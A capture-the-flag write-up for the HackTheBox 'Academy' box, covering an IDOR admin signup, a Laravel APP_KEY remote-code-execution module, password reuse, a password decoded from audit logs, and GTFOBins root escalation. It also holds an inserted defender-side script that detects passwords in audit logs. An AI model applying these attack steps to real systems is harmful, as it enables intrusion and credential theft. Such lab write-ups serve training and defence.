Information
Box#
- Name: Academy
- Profile: www.hackthebox.eu
- Difficulty: Easy
- OS: Linux
- Points: 20
Write-up
Overview#
Install the tools used in this write-up on BlackArch Linux:
```
$ sudo pacman -S nmap ffuf metasploit gtfoblookup
```
Network enumeration#
Port and service discovery scan with nmap:
```
# Nmap 7.91 scan initiated Tue Feb 2 18:57:09 2021 as: nmap -sSVC -p- -v -oA nmap_scan 10.10.10.215
```
Add the hostname to the hosts file:
```
$ cat /etc/hosts | grep academy
```
Let's start with the web port, but keep in mind that there is also an unusual port, 33060.
Web enumeration#
We can register and login at http://academy.htb/. But there is not much to see there.
So let's enumerate with ffuf:
```
$ ffuf -u http://academy.htb/FUZZ -c -w /usr/share/seclists/Discovery/Web-Content/raft-small-files-lowercase.txt -fc 403
```
We notice there is an admin page.
Web exploitation: IDOR#
When registering there is a parameter `roleid`; if we change it from zero (user) to one (admin), we may get an admin account.
```
POST /register.php HTTP/1.1
```
Then we can log in at http://academy.htb/admin.php. If you leave `roleid=0`, you can't.
On the admin dashboard there is a todolist with a status.
Item | Status |
---|---|
Complete initial set of modules (cry0l1t3 / mrb3n) | done |
Finalize website design | done |
Test all modules | done |
Prepare launch campaign | done |
Separate student and admin roles | done |
Fix issue with dev-staging-01.academy.htb | pending |
Let's add the new subdomain to our hosts file.
```
$ cat /etc/hosts | grep academy
```
Web exploitation: Laravel RCE and debug mode#
Let's go to http://dev-staging-01.academy.htb/.
We are welcomed by a Laravel debugger.
Here we have a bunch of environment variables leaking secrets:
```
APP_NAME "Laravel"
```
By searching for "laravel api key exploit" I found this metasploit exploit.
The RCE exploit requires the APP_KEY, and we already have it from the leak.
```
msf6 exploit(unix/http/laravel_token_unserialize_exec) > options
```
Elevation of Privilege (EoP): from www-data to cry0l1t3#
First let's get a full TTY.
```
$ python3 -c 'import pty; pty.spawn("/bin/bash")'
```
There are plenty of users we could target:
```
www-data@academy:/var/www/html/htb-academy-dev-01/public$ cat /etc/passwd
```
Then I ran a recursive listing of the home directories: `ls -lhAR /home`.
- 21y4d: empty
- ch4p: empty
- cry0l1t3: the user flag is there, and stuff about lxd (useful for EoP); `/home/cry0l1t3/.mysql_history` -> we don't have permission
- egre55: empty
- g0blin: empty
- mrb3n: dirty stuff; `/home/mrb3n/.config/composer/.htaccess` -> deny from all; `/home/mrb3n/.local/share/composer/.htaccess` -> deny from all
Connecting to the DB fails with the mysql creds found in `/var/www/html/htb-academy-dev-01/.env` (the same ones as the Laravel config):
```
DB_CONNECTION=mysql
```
Maybe with the ones in `/var/www/html/academy/.env`?
```
DB_CONNECTION=mysql
```
No luck either.
But I tried to reuse the password `mySup3rP4s5w0rd!!` with the user cry0l1t3, and it worked (remember he had a `.mysql_history` in his home).
```
$ cat user.txt
```
Elevation of Privilege (EoP): from cry0l1t3 to mrb3n#
As we are in the `adm` group, I launched a command to see which files we can access through this group: `find / -group adm -type f 2>/dev/null`.
We have access to all logs in `/var/log`.
There are some interesting files, but passwords are redacted.
```
$ grep -ri password /var/log 2>/dev/null
```
It's possible that `/var/log/audit/audit.log` is logging passwords during auth attempts.
Ref. Logging Passwords on Linux
```
$ grep -r 'comm="sudo"' /var/log/audit
```
The password is hex-encoded.
```
$ printf %s '6D7262336E5F41634064336D79210A' | xxd -r -p
```
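The same decoding, turned into a defender-side check that is not part of the write-up: it scans TTY audit records (the `type=TTY ... comm="..." data=<hex>` lines pam_tty_audit writes) and flags keystrokes captured while a credential-reading command such as `sudo` or `su` was running. The log lines below are constructed; only the `sudo` record's hex is the value seen on the box.

```python
import re

# Constructed sample of audit.log TTY records (pids, uids and timestamps are made up).
# pam_tty_audit stores the typed keystrokes hex-encoded in the data= field.
SAMPLE_AUDIT_LOG = """\
type=TTY msg=audit(1612288721.123:87): tty pid=2520 uid=1002 auid=1002 ses=4 major=4 minor=1 comm="bash" data=6C73202D6C610A
type=TTY msg=audit(1612288730.456:88): tty pid=2527 uid=1002 auid=1002 ses=4 major=4 minor=1 comm="sudo" data=6D7262336E5F41634064336D79210A
type=TTY msg=audit(1612288740.789:89): tty pid=2533 uid=1002 auid=1002 ses=4 major=4 minor=1 comm="su" data=4578616D706C654F6E6C79310A
type=USER_AUTH msg=audit(1612288741.000:90): pid=2533 uid=1002 auid=1002 ses=4 msg='op=PAM:authentication res=success'
"""

# Only TTY records carry keystrokes; "\suid=" avoids matching the auid= field.
TTY_RE = re.compile(
    r'^type=TTY .*?\suid=(?P<uid>\d+) .*?comm="(?P<comm>[^"]+)" data=(?P<data>[0-9A-Fa-f]+)'
)

# Commands that read a secret from the terminal: keystrokes logged while they
# run are almost certainly passwords, so their presence means log_passwd is on.
CREDENTIAL_READERS = {"sudo", "su", "ssh", "passwd", "mysql"}


def parse_tty_records(log_text):
    """Yield (uid, comm, decoded keystrokes) for every well-formed TTY record."""
    for line in log_text.splitlines():
        m = TTY_RE.search(line)
        if not m:
            continue
        hexdata = m.group("data")
        if len(hexdata) % 2:  # truncated record: skip rather than crash
            continue
        keys = bytes.fromhex(hexdata).decode("utf-8", errors="replace")
        yield int(m.group("uid")), m.group("comm"), keys


def find_leaked_secrets(log_text):
    """Return (uid, comm, keystrokes) for input typed into a credential-reading command."""
    return [
        (uid, comm, keys.rstrip("\n"))
        for uid, comm, keys in parse_tty_records(log_text)
        if comm in CREDENTIAL_READERS
    ]


if __name__ == "__main__":
    for uid, comm, keys in find_leaked_secrets(SAMPLE_AUDIT_LOG):
        # Report the fact, not the secret: the point is to know the log must be fixed.
        print(f"uid={uid} comm={comm}: {len(keys)} keystrokes captured, secret exposed")
```

Any hit means the pam_tty_audit `log_passwd` option is active and the audit log (readable here by the `adm` group) must be treated as a credential store until it is disabled and the affected passwords are rotated.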
Elevation of Privilege (EoP): from mrb3n to root#
mrb3n is a sudoer:
```
$ su mrb3n
```
So let's check GTFOBins for that one:
```
$ gtfoblookup update
```
So let's do that:
```
$ TF=$(mktemp -d)
```